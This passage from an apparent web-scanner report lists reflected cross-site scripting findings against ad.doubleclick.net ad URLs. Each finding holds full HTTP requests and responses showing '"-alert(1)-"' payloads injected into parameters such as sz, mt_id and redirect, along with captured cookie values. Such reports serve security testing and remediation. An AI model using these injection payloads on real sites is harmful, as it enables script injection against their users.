<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
b25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw30950"-alert(1)-"246a968b642&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/cre/scoreboard-display.aspx%3F%26code%3D9903600269");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982c"-alert(1)-"f7eecd04480 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le982c"-alert(1)-"f7eecd04480&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:35:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7441

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/f/1d2/%2a/r%3B236519140%3B5-0%3B0%3B44340201%3B3454-728/90%3B40726720/40744507/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le982c"-alert(1)-"f7eecd04480&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjA
...[SNIP]...

2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2115e"-alert(1)-"a9e584a7d9f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=1005002115e"-alert(1)-"a9e584a7d9f&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
k%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=1005002115e"-alert(1)-"a9e584a7d9f&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscrip
...[SNIP]...

2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ebc9"-alert(1)-"fe7d4fbae1a was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=1156117ebc9"-alert(1)-"fe7d4fbae1a&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=1156117ebc9"-alert(1)-"fe7d4fbae1a&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbb42"-alert(1)-"ab8fffa114e was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07fbb42"-alert(1)-"ab8fffa114e&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07fbb42"-alert(1)-"ab8fffa114e&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "fals
...[SNIP]...

2.28. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e10b"-alert(1)-"059a3aecd25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=&3e10b"-alert(1)-"059a3aecd25=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5958

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=&3e10b"-alert(1)-"059a3aecd25=1http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "false";
var
...[SNIP]...

2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b67a"-alert(1)-"f51039e8e90 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=7b67a"-alert(1)-"f51039e8e90 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=7b67a"-alert(1)-"f51039e8e90http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "false";
var w
...[SNIP]...

2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05be"-alert(1)-"3b8c2aa8f2c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629f05be"-alert(1)-"3b8c2aa8f2c&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
